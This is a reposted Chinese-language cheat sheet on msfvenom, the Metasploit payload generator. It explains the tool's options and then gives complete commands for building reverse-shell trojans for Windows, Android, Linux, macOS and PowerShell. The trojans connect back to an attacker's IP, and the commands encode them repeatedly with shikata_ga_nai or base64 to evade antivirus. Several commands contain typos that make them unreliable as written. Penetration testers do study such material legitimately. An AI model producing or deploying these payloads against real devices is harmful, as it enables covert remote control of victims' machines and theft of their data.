msfvenom常見的使用命令


原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程序,並在目標機上執行,在本地監聽上線

使用說明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模塊可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 為payload指定一個 nopsled 長度
-f, --format 指定輸出格式,如exe等
-e, --encoder 使用編碼器
-a, --arch 指定payload構架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻擊荷載的最大長度
-b, --bad-chars 指定規避字符集,如: '\x00\xff‘
-i, --iterations 指定編碼次數
-c, --add-code 指定一個附加的win32 shellcode 文件
-x, --template 指定一個可執行文件作為模板
-k, --keep payload自動分離並注入到新的進程
-o, --out 保存生成的payload
-v, --var-name 指定自定義變量
-h, --help 顯示幫助文件

一、查看msfvenom支持的payload    msfvenom --list payload

二、查看msfvenom支持的平台         msfvenom --list platforms

三、查看msfvenom支持的編碼格式  msfvenom --list encoders  其他的也是同理

使用Metaspoilt生成木馬
msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.30.133 LPORT=12345 - e x86/shikata_ga_nai -b '\x00\xff' -i 3 -f exe -o chen.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST= =<攻擊機IP> LPORT==<攻擊機端口> -o
mm.apk
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<攻擊機IP>
LPORT=<攻擊機端口> -
f elf -o payload.elf
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<攻擊機IP> LPORT=<攻擊機
端口> -f macho - o payload.macho
msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp LHOST=<攻擊機IP>
LPORT=<攻擊機端口> -e
cmd/powershell_base64 -i 3 -f raw -o payload.ps1


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM